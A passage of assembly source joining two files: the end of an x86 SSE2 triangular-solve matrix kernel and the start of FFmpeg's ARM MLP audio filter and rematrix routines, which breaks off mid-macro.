#if defined(LN) || defined(LT)
movapd 0 * SIZE(B), %xmm0
movapd 2 * SIZE(B), %xmm1
#else
movapd 0 * SIZE(AA), %xmm0
movapd 2 * SIZE(AA), %xmm1
#endif
subpd %xmm4, %xmm0
subpd %xmm6, %xmm1
#ifdef LN
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movapd %xmm1, %xmm3
unpckhpd %xmm3, %xmm3
movsd 15 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm3
movsd 14 * SIZE(AA), %xmm5
mulsd %xmm3, %xmm5
subsd %xmm5, %xmm1
movsd 13 * SIZE(AA), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm2
movsd 12 * SIZE(AA), %xmm7
mulsd %xmm3, %xmm7
subsd %xmm7, %xmm0
movsd 10 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm1
movsd 9 * SIZE(AA), %xmm5
mulsd %xmm1, %xmm5
subsd %xmm5, %xmm2
movsd 8 * SIZE(AA), %xmm6
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm0
movsd 5 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 4 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm0
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
unpcklpd %xmm2, %xmm0
unpcklpd %xmm3, %xmm1
#endif
#ifdef LT
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movapd %xmm1, %xmm3
unpckhpd %xmm3, %xmm3
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
movsd 1 * SIZE(AA), %xmm5
mulsd %xmm0, %xmm5
subsd %xmm5, %xmm2
movsd 2 * SIZE(AA), %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm1
movsd 3 * SIZE(AA), %xmm7
mulsd %xmm0, %xmm7
subsd %xmm7, %xmm3
movsd 5 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 6 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm1
movsd 7 * SIZE(AA), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm3
movsd 10 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm1
movsd 11 * SIZE(AA), %xmm5
mulsd %xmm1, %xmm5
subsd %xmm5, %xmm3
movsd 15 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm3
unpcklpd %xmm2, %xmm0
unpcklpd %xmm3, %xmm1
#endif
#if defined(RN) || defined(RT)
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
mulpd %xmm4, %xmm1
#endif
#if defined(LN) || defined(LT)
movapd %xmm0, 0 * SIZE(B)
movapd %xmm1, 2 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movhpd %xmm0, 2 * SIZE(BB)
movhpd %xmm0, 3 * SIZE(BB)
movsd %xmm1, 4 * SIZE(BB)
movsd %xmm1, 5 * SIZE(BB)
movhpd %xmm1, 6 * SIZE(BB)
movhpd %xmm1, 7 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
movapd %xmm1, 2 * SIZE(AA)
#endif
#ifdef LN
subl $4 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
movsd %xmm1, 2 * SIZE(%esi)
movhpd %xmm1, 3 * SIZE(%esi)
#ifndef LN
addl $4 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 4), AA
#ifdef LT
addl $4 * SIZE, B
#endif
#endif
#ifdef LN
subl $4, KK
movl BORIG, B
#endif
#ifdef LT
addl $4, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $2 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
BRANCH
decl %ebx # i --
jg .L110
ALIGN_2
.L130:
movl M, %ebx
testl $2, %ebx
jle .L150
#ifdef LN
movl K, %eax
sall $1 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
#endif
leal BUFFER, BB
movapd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movapd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movapd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L132
.L131:
mulpd %xmm0, %xmm2
movapd 2 * SIZE(AA), %xmm0
addpd %xmm2, %xmm4
mulpd 2 * SIZE(BB), %xmm0
movapd 16 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 4 * SIZE(AA), %xmm0
mulpd 4 * SIZE(BB), %xmm0
addpd %xmm0, %xmm6
movapd 6 * SIZE(AA), %xmm0
mulpd 6 * SIZE(BB), %xmm0
addpd %xmm0, %xmm7
movapd 16 * SIZE(AA), %xmm0
mulpd %xmm1, %xmm3
movapd 10 * SIZE(AA), %xmm1
addpd %xmm3, %xmm4
mulpd 10 * SIZE(BB), %xmm1
movapd 24 * SIZE(BB), %xmm3
addpd %xmm1, %xmm5
movapd 12 * SIZE(AA), %xmm1
mulpd 12 * SIZE(BB), %xmm1
addpd %xmm1, %xmm6
movapd 14 * SIZE(AA), %xmm1
mulpd 14 * SIZE(BB), %xmm1
addpd %xmm1, %xmm7
movapd 24 * SIZE(AA), %xmm1
addl $16 * SIZE, AA
addl $16 * SIZE, BB
BRANCH
decl %eax
jne .L131
.L132:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # k & 7 remaining iterations
BRANCH
je .L134
.L133:
movapd 0 * SIZE(AA), %xmm0
mulpd 0 * SIZE(BB), %xmm0
addpd %xmm0, %xmm4
addl $2 * SIZE, AA # aoffset += 2 * SIZE
addl $2 * SIZE, BB # boffset1 += 2 * SIZE
decl %eax
BRANCH
jg .L133
ALIGN_4
.L134:
addpd %xmm5, %xmm4
addpd %xmm7, %xmm6
addpd %xmm6, %xmm4
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $2, %eax
#else
subl $1, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#if defined(LN) || defined(LT)
movapd 0 * SIZE(B), %xmm0
#else
movapd 0 * SIZE(AA), %xmm0
#endif
subpd %xmm4, %xmm0
#ifdef LN
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movsd 3 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 2 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm0
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
unpcklpd %xmm2, %xmm0
#endif
#ifdef LT
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
movsd 1 * SIZE(AA), %xmm5
mulsd %xmm0, %xmm5
subsd %xmm5, %xmm2
movsd 3 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
unpcklpd %xmm2, %xmm0
#endif
#if defined(RN) || defined(RT)
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
#endif
#if defined(LN) || defined(LT)
movapd %xmm0, 0 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movhpd %xmm0, 2 * SIZE(BB)
movhpd %xmm0, 3 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
#endif
#ifdef LN
subl $2 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
#ifndef LN
addl $2 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 2), AA
#ifdef LT
addl $2 * SIZE, B
#endif
#endif
#ifdef LN
subl $2, KK
movl BORIG, B
#endif
#ifdef LT
addl $2, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $1 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L150:
movl M, %ebx
testl $1, %ebx
jle .L159
#ifdef LN
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
#endif
leal BUFFER, BB
movsd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movsd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movsd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movsd 4 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L152
.L151:
mulsd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
addsd %xmm2, %xmm4
mulsd 2 * SIZE(BB), %xmm0
movsd 16 * SIZE(BB), %xmm2
addsd %xmm0, %xmm4
movsd 2 * SIZE(AA), %xmm0
mulsd 4 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
movsd 3 * SIZE(AA), %xmm0
mulsd 6 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
movsd 8 * SIZE(AA), %xmm0
mulsd %xmm1, %xmm3
movsd 5 * SIZE(AA), %xmm1
addsd %xmm3, %xmm4
mulsd 10 * SIZE(BB), %xmm1
movsd 24 * SIZE(BB), %xmm3
addsd %xmm1, %xmm4
movsd 6 * SIZE(AA), %xmm1
mulsd 12 * SIZE(BB), %xmm1
addsd %xmm1, %xmm4
movsd 7 * SIZE(AA), %xmm1
mulsd 14 * SIZE(BB), %xmm1
addsd %xmm1, %xmm4
movsd 12 * SIZE(AA), %xmm1
addl $ 8 * SIZE, AA
addl $16 * SIZE, BB
BRANCH
decl %eax
jne .L151
.L152:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # k & 7 remaining iterations
BRANCH
je .L154
.L153:
movsd 0 * SIZE(AA), %xmm0
mulsd 0 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
addl $1 * SIZE, AA # aoffset += 1 * SIZE
addl $2 * SIZE, BB # boffset1 += 2 * SIZE
decl %eax
BRANCH
jg .L153
ALIGN_4
.L154:
addsd %xmm6, %xmm4
addsd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
subl $1, %eax
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#if defined(LN) || defined(LT)
movsd 0 * SIZE(B), %xmm0
#else
movsd 0 * SIZE(AA), %xmm0
#endif
subsd %xmm4, %xmm0
#if defined(LN) || defined(LT)
mulsd 0 * SIZE(AA), %xmm0
#endif
#if defined(RN) || defined(RT)
mulsd 0 * SIZE(B), %xmm0
#endif
#if defined(LN) || defined(LT)
movsd %xmm0, 0 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
#else
movsd %xmm0, 0 * SIZE(AA)
#endif
#ifdef LN
subl $1 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
#ifndef LN
addl $1 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 1), AA
#ifdef LT
addl $1 * SIZE, B
#endif
#endif
#ifdef LN
subl $1, KK
movl BORIG, B
#endif
#ifdef LT
addl $1, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $0 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L159:
#ifdef LN
movl K, %eax
leal (, %eax, SIZE), %eax
leal (B, %eax, 1), B
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (B, %eax, 1), B
#endif
#ifdef RN
addl $1, KK
#endif
#ifdef RT
subl $1, KK
#endif
ALIGN_2
.L999:
movl OLD_STACK, %esp
EMMS
popl %ebx
popl %esi
popl %edi
popl %ebp
ret
ALIGN_2
EPILOGUE
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2014 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define MAX_CHANNELS 8
#define MAX_FIR_ORDER 8
#define MAX_IIR_ORDER 4
#define MAX_RATEFACTOR 4
#define MAX_BLOCKSIZE (40 * MAX_RATEFACTOR)
PST .req a1
PCO .req a2
AC0 .req a3
AC1 .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
ST0 .req v5
ST1 .req v6
ST2 .req sl
ST3 .req fp
I .req ip
PSAMP .req lr
.macro branch_pic_label first, remainder:vararg
A .word \first - 4
T .hword (\first) / 2
.ifnb \remainder
branch_pic_label \remainder
.endif
.endm
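// Each branch_pic_label invocation emits one jump-table entry: an offset
// word for ARM state, consumed by the "ldr CO0, [pc, ...]; add pc, pc, CO0"
// sequences below, or a halfword for the Thumb-2 tbh instruction, keeping
// the dispatch position-independent.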
// Some macros that do loads/multiplies where the register number is determined
// from an assembly-time expression. Boy is GNU assembler's syntax ugly...
.macro load group, index, base, offset
.altmacro
load_ \group, %(\index), \base, \offset
.noaltmacro
.endm
.macro load_ group, index, base, offset
ldr \group\index, [\base, #\offset]
.endm
.macro loadd group, index, base, offset
.altmacro
loadd_ \group, %(\index), %(\index+1), \base, \offset
.noaltmacro
.endm
.macro loadd_ group, index0, index1, base, offset
A .if \offset >= 256
A ldr \group\index0, [\base, #\offset]
A ldr \group\index1, [\base, #(\offset) + 4]
A .else
ldrd \group\index0, \group\index1, [\base, #\offset]
A .endif
.endm
.macro multiply index, accumulate, long
.altmacro
multiply_ %(\index), \accumulate, \long
.noaltmacro
.endm
.macro multiply_ index, accumulate, long
.if \long
.if \accumulate
smlal AC0, AC1, CO\index, ST\index
.else
smull AC0, AC1, CO\index, ST\index
.endif
.else
.if \accumulate
mla AC0, CO\index, ST\index, AC0
.else
mul AC0, CO\index, ST\index
.endif
.endif
.endm
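// Worked example: with LOAD_REG = 2 and OFFSET_CO = 8,
//     load CO, LOAD_REG, PCO, OFFSET_CO
// expands through the .altmacro %() evaluation to
//     ldr CO2, [PCO, #8]
// and "multiply 2, 1, 1" becomes "smlal AC0, AC1, CO2, ST2".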
// A macro to update the load register number and load offsets
.macro inc howmany
.set LOAD_REG, (LOAD_REG + \howmany) & 3
.set OFFSET_CO, OFFSET_CO + 4 * \howmany
.set OFFSET_ST, OFFSET_ST + 4 * \howmany
.if FIR_REMAIN > 0
.set FIR_REMAIN, FIR_REMAIN - \howmany
.if FIR_REMAIN == 0
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.endif
.elseif IIR_REMAIN > 0
.set IIR_REMAIN, IIR_REMAIN - \howmany
.endif
.endm
// Macro to implement the inner loop for one specific combination of parameters
.macro implement_filter mask_minus1, shift_0, shift_8, iir_taps, fir_taps
.set TOTAL_TAPS, \iir_taps + \fir_taps
// Deal with register allocation...
.set DEFINED_SHIFT, 0
.set DEFINED_MASK, 0
.set SHUFFLE_SHIFT, 0
.set SHUFFLE_MASK, 0
.set SPILL_SHIFT, 0
.set SPILL_MASK, 0
.if TOTAL_TAPS == 0
// Little register pressure in this case - just keep MASK where it was
.if !\mask_minus1
MASK .req ST1
.set DEFINED_MASK, 1
.endif
.else
.if \shift_0
.if !\mask_minus1
// AC1 is unused with shift 0
MASK .req AC1
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif \shift_8
.if !\mask_minus1
.if TOTAL_TAPS <= 4
// All coefficients are preloaded (so pointer not needed)
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.else
.set SPILL_MASK, 1
.endif
.endif
.else // shift not 0 or 8
.if TOTAL_TAPS <= 3
// All coefficients are preloaded, and at least one CO register is unused
.if \fir_taps & 1
SHIFT .req CO0
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.else
SHIFT .req CO3
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.endif
.if !\mask_minus1
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif TOTAL_TAPS == 4
// All coefficients are preloaded
SHIFT .req PCO
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.else
.set SPILL_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.endif
.endif
.endif
.if SPILL_SHIFT
SHIFT .req ST0
.set DEFINED_SHIFT, 1
.endif
.if SPILL_MASK
MASK .req ST1
.set DEFINED_MASK, 1
.endif
// Preload coefficients if possible
.if TOTAL_TAPS <= 4
.set OFFSET_CO, 0
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.rept \fir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.rept \iir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.endif
// Move mask/shift to final positions if necessary
// Need to do this after preloading, because in some cases we
// reuse the coefficient pointer register
.if SHUFFLE_SHIFT
mov SHIFT, ST0
.endif
.if SHUFFLE_MASK
mov MASK, ST1
.endif
// Begin loop
01:
.if TOTAL_TAPS == 0
// Things simplify a lot in this case
// In fact this could be pipelined further if it's worth it...
ldr ST0, [PSAMP]
subs I, I, #1
.if !\mask_minus1
and ST0, ST0, MASK
.endif
str ST0, [PST, #-4]!
str ST0, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST0, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.else
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.set LOAD_BANK, 0
.set FIR_REMAIN, \fir_taps
.set IIR_REMAIN, \iir_taps
.if FIR_REMAIN == 0 // only IIR terms
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.else
.set OFFSET_CO, 0
.set OFFSET_ST, 0
.endif
.set MUL_REG, LOAD_REG
.set COUNTER, 0
.rept TOTAL_TAPS + 2
// Do load(s)
.if FIR_REMAIN != 0 || IIR_REMAIN != 0
.if COUNTER == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif COUNTER == 1 && (\fir_taps & 1) == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif LOAD_BANK == 0
.if TOTAL_TAPS > 4
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load CO, LOAD_REG, PCO, OFFSET_CO
.else
loadd CO, LOAD_REG, PCO, OFFSET_CO
.endif
.endif
.set LOAD_BANK, 1
.else
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.else
loadd ST, LOAD_REG, PST, OFFSET_ST
inc 2
.endif
.set LOAD_BANK, 0
.endif
.endif
// Do interleaved multiplies, slightly delayed
.if COUNTER >= 2
multiply MUL_REG, COUNTER > 2, !\shift_0
.set MUL_REG, (MUL_REG + 1) & 3
.endif
.set COUNTER, COUNTER + 1
.endr
// Post-process the result of the multiplies
.if SPILL_SHIFT
ldr SHIFT, [sp, #9*4 + 0*4]
.endif
.if SPILL_MASK
ldr MASK, [sp, #9*4 + 1*4]
.endif
ldr ST2, [PSAMP]
subs I, I, #1
.if \shift_8
mov AC0, AC0, lsr #8
orr AC0, AC0, AC1, lsl #24
.elseif !\shift_0
rsb ST3, SHIFT, #32
mov AC0, AC0, lsr SHIFT
A orr AC0, AC0, AC1, lsl ST3
T mov AC1, AC1, lsl ST3
T orr AC0, AC0, AC1
.endif
.if \mask_minus1
add ST3, ST2, AC0
.else
add ST2, ST2, AC0
and ST3, ST2, MASK
sub ST2, ST3, AC0
.endif
str ST3, [PST, #-4]!
str ST2, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST3, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.endif
b 99f
.if DEFINED_SHIFT
.unreq SHIFT
.endif
.if DEFINED_MASK
.unreq MASK
.endif
.endm
.macro switch_on_fir_taps mask_minus1, shift_0, shift_8, iir_taps
A ldr CO0, [pc, a3, lsl #2] // firorder is in range 0-(8-iir_taps)
A add pc, pc, CO0
T tbh [pc, a3, lsl #1]
0:
branch_pic_label (70f - 0b), (71f - 0b), (72f - 0b), (73f - 0b)
branch_pic_label (74f - 0b)
.if \iir_taps <= 3
branch_pic_label (75f - 0b)
.if \iir_taps <= 2
branch_pic_label (76f - 0b)
.if \iir_taps <= 1
branch_pic_label (77f - 0b)
.if \iir_taps == 0
branch_pic_label (78f - 0b)
.endif
.endif
.endif
.endif
70: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 0
71: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 1
72: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 2
73: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 3
74: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 4
.if \iir_taps <= 3
75: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 5
.if \iir_taps <= 2
76: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 6
.if \iir_taps <= 1
77: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 7
.if \iir_taps == 0
78: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 8
.endif
.endif
.endif
.endif
.endm
.macro switch_on_iir_taps mask_minus1, shift_0, shift_8
A ldr CO0, [pc, a4, lsl #2] // iirorder is in range 0-4
A add pc, pc, CO0
T tbh [pc, a4, lsl #1]
0:
branch_pic_label (60f - 0b), (61f - 0b), (62f - 0b), (63f - 0b)
branch_pic_label (64f - 0b)
60: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 0
61: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 1
62: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 2
63: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 3
64: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 4
.endm
/* void ff_mlp_filter_channel_arm(int32_t *state, const int32_t *coeff,
* int firorder, int iirorder,
* unsigned int filter_shift, int32_t mask,
* int blocksize, int32_t *sample_buffer);
*/
function ff_mlp_filter_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {ST0,ST1,I,PSAMP}
cmp ST1, #-1
bne 30f
movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 20f
bcs 10f
switch_on_iir_taps 1, 1, 0
10: switch_on_iir_taps 1, 0, 1
20: switch_on_iir_taps 1, 0, 0
30: movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 50f
bcs 40f
switch_on_iir_taps 0, 1, 0
40: switch_on_iir_taps 0, 0, 1
50: switch_on_iir_taps 0, 0, 0
99: pop {v1-fp,pc}
endfunc
.unreq PST
.unreq PCO
.unreq AC0
.unreq AC1
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq ST0
.unreq ST1
.unreq ST2
.unreq ST3
.unreq I
.unreq PSAMP
/********************************************************************/
PSA .req a1 // samples
PCO .req a2 // coeffs
PBL .req a3 // bypassed_lsbs
INDEX .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
SA0 .req v5
SA1 .req v6
SA2 .req sl
SA3 .req fp
AC0 .req ip
AC1 .req lr
NOISE .req SA0
LSB .req SA1
DCH .req SA2 // dest_ch
MASK .req SA3
// INDEX is used as follows:
// bits 0..6 index2 (values up to 17, but wider so that we can
// add to index field without needing to mask)
// bits 7..14 i (values up to 160)
// bit 15 underflow detect for i
// bits 25..31 (if access_unit_size_pow2 == 128) \ index
// bits 26..31 (if access_unit_size_pow2 == 64) /
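// Worked example: with access_unit_size_pow2 == 128 the noise index sits in
// bits 25..31, so
//     add NOISE, NOISE, INDEX, lsr #32-7
// recovers it as a byte offset into the noise buffer, while
//     sub INDEX, INDEX, #1<<7
// decrements i in bits 7..14; on underflow bit 15 becomes set and the
// "tst INDEX, #1<<15" at the bottom of the loop terminates the iteration.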
.macro implement_rematrix shift, index_mask, mask_minus1, maxchan
.if \maxchan == 1
// We can just leave the coefficients in registers in this case
ldrd CO0, CO1, [PCO]
.endif
1:
.if \maxchan == 1
ldrd SA0, SA1, [PSA]
smull AC0, AC1, CO0, SA0
.elseif \maxchan == 5
ldr CO0, [PCO, #0]
ldr SA0, [PSA, #0]
ldr CO1, [PCO, #4]
ldr SA1, [PSA, #4]
ldrd CO2, CO3, [PCO, #8]
smull AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #8]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #16]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #16]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.else // \maxchan == 7
ldr CO2, [PCO, #0]
ldr SA2, [PSA, #0]
ldr CO3, [PCO, #4]
ldr SA3, [PSA, #4]
ldrd CO0, CO1, [PCO, #8]
smull AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #8]
smlal AC0, AC1, CO3, SA3
ldrd CO2, CO3, [PCO, #16]
smlal AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #16]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #24]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #24]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.endif
ldm sp, {NOISE, DCH, MASK}
smlal AC0, AC1, CO1, SA1
.if \shift != 0
.if \index_mask == 63
add NOISE, NOISE, INDEX, lsr #32-6
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-6
.else // \index_mask == 127
add NOISE, NOISE, INDEX, lsr #32-7
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-7
.endif
sub INDEX, INDEX, #1<<7
adds AC0, AC0, NOISE, lsl #\shift + 7
adc AC1, AC1, NOISE, asr #31
.else
ldrb LSB, [PBL], #MAX_CHANNELS
sub INDEX, INDEX, #1<<7
.endif
add PSA, PSA, #MAX_CHANNELS*4
mov AC0, AC0, lsr #14
orr AC0, AC0, AC1, lsl #18
.if !\mask_minus1
and AC0, AC0, MASK
.endif
add AC0, AC0, LSB
tst INDEX, #1<<15
str AC0, [PSA, DCH, lsl #2] // DCH is precompensated for the early increment of PSA
beq 1b
b 98f
.endm
.macro switch_on_maxchan shift, index_mask, mask_minus1
cmp v4, #5
blo 51f
beq 50f
implement_rematrix \shift, \index_mask, \mask_minus1, 7
50: implement_rematrix \shift, \index_mask, \mask_minus1, 5
51: implement_rematrix \shift, \index_mask, \mask_minus1, 1
.endm
.macro switch_on_mask shift, index_mask
cmp sl, #-1
bne 40f
switch_on_maxchan \shift, \index_mask, 1
40: switch_on_maxchan \shift, \index_mask, 0
.endm
.macro switch_on_au_size shift
.if \shift == 0
switch_on_mask \shift, undefined
.else
teq v6, #64
bne 30f
orr INDEX, INDEX, v1, lsl #32-6
switch_on_mask \shift, 63
30: orr INDEX, INDEX, v1, lsl #32-7
switch_on_mask \shift, 127
.endif
